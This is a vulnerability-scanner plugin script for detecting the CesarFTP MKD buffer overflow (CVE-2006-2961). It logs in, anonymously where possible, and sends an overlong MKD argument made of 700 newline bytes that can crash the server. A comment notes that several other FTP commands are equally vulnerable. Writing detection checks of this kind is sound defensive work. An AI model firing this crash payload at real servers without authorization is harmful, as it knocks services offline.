#
# Script Written By Ferdy Riphagen 
#
# Script distributed under the GNU GPLv2 License.
# 
# Original advisory:
# http://www.securiteam.com/exploits/5AP0B2AIUY.html 
#

if (description) {
 script_id(200058); 
 script_version("$Revision: 1.0 $");

 script_cve_id("CVE-2006-2961");
 script_bugtraq_id(18586);
 script_xref(name:"OSVDB", value:"26364");

 name = "CesarFTP MKD Command Buffer Overflow";
 script_name(name);
 desc = "
Synopsis :

The remote system is running CesarFTP server, which is 
vulnerable to a buffer overflow attack. 

Description :

CesarFTP Server version <= 0.99g is prone to a buffer overflow 
attack when using some ftp command followed with a long string
of arguments. 

The system could crash, and accepts/execute arbitrary commands
after the initial overflow attack.

Note that the service runs with LOCAL SYSTEM privileges on the 
remote host, which means that an attacker can possible gain complete
control over the system.

To use the flaw an attacker needs access to the requested FTP server,
by using a valid account/password or if activated the anonymous account. 
                
See Also :

http://secunia.com/advisories/20574/

Solution :

At time of writing there is no update available.
Filter access to the FTP service, so that it can be used by trusted
sources only.

Risk factor :

Medium / CVSS Base Score : 6 
(AV:R/AC:L/Au:R/C:C/A:C/I:C/B:N)";
 script_description(desc);
 summary = "Detect a buffer overflow in CesarFTP server via a long MKD string";
 script_summary(summary);

 script_category(ACT_DENIAL);
 script_family("Denial of Service");
 script_copyright("This script is Copyright (C) 2006 Ferdy Riphagen");

 script_dependencies("find_service.nes", "secpod_ftp_anonymous.nasl");
 script_require_ports("Services/ftp", 21);
 exit(0);
}

include("ftp_func.inc");
include("global_settings.inc");

port = get_kb_item("Services/ftp");
if (!port) port = 21;
if (!get_port_state(port)) exit(0);

soc = open_sock_tcp(port);
if (soc) {
 
 # Use the 'HELP' command for version info 
 ftp_send_cmd(socket:soc, cmd:"HELP");
 banner = recv(socket:soc, length:1024);

if (!banner || ("CesarFTP server" >!< banner)) exit(0);
 user = get_kb_item("ftp/login");
 pass = get_kb_item("ftp/password");

 if (!user) {
  if (get_kb_item("ftp/anonymous")) {
   user = "anonymous";
   pass = "anonymous@anonymous.xx";
  }
  else exit(0); 
 }

 if (!ftp_authenticate(socket:soc, user:user, pass:pass)) exit(0); 

 # Note:
 # The original advisory is made for the MKD command. But at least
 # the APPE, DELE, RMD, LIST, CWD, RETR commands are also vulnerable 
 # to the same stack overflow.  
 
 ftpcmd = "MKD";
 buff = string(ftpcmd, raw_string(0x20), crap(data:raw_string(0x0A), length:700), "\r\n");
 send = send(socket:soc, data:buff); 

 recv = recv(socket:soc, length:1024);
 close(soc);

 soc = open_sock_tcp(port);
 if (soc) {
  line = ftp_recv_line(socket:soc, retry:2);
 }
 if (!soc || (!strlen(line))) {
  security_warning(port);
 }   
 if (soc) close(soc); 
}

